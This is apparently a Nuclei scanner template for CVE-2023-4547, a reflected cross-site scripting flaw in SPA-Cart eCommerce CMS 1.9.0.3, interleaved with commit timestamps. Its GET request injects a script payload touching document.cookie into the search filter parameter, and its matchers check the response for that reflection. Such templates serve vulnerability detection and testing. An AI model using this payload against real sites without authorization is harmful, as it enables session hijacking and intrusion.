2023-10-17 07:20:28 +00:00
id : CVE-2023-4547
info :
name : SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting
author : theamanrawat
severity : medium
description : |
A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.
reference :
- https://spa-cart.com
- https://cxsecurity.com/ascii/WLB-2023080090
- https://nvd.nist.gov/vuln/detail/CVE-2023-4547
2023-10-17 17:52:26 +00:00
- https://vuldb.com/?ctiid.238058
- https://vuldb.com/?id.238058
2023-10-17 07:20:28 +00:00
classification :
2023-10-17 17:52:26 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2023-10-17 07:20:28 +00:00
cve-id : CVE-2023-4547
cwe-id : CWE-79
2023-10-18 16:26:30 +00:00
epss-score : 0.00205
2023-10-27 16:34:45 +00:00
epss-percentile : 0.58207
2023-10-17 17:52:26 +00:00
cpe : cpe:2.3:a:spa-cart:ecommerce_cms:1.9.0.3:*:*:*:*:*:*:*
2023-10-17 07:20:28 +00:00
metadata :
verified : "true"
2023-10-17 17:52:26 +00:00
max-request : 1
vendor : spa-cart
product : ecommerce_cms
2023-10-17 07:20:28 +00:00
tags : cve,cve2023,spa-cart,unauth,xss
http :
- method : GET
path :
- '{{BaseURL}}/search?filtered=1&q=test&filter[price]=100-1331"><script>alert(document.cookie)</script>&filter[attr][Memory][]=16+GB'
matchers-condition : and
matchers :
- type : word
part : body
words :
- '100-1331"><script>alert(document.cookie)</script>'
- '<table class="products-nav">'
condition : and
- type : word
part : header
words :
- 'text/html'
- type : status
status :
- 200
2023-10-28 07:54:29 +00:00
# digest: 4b0a00483046022100a11156643e93611916424ab4f899a28793c429b6c3cd9074374a6de03e7988e9022100fa1d47f9209cea2d93528a83dfdd1cc77dd8da4081847f85e6fcd7c3b72db741:922c64590222798bb761d5b6d8e72950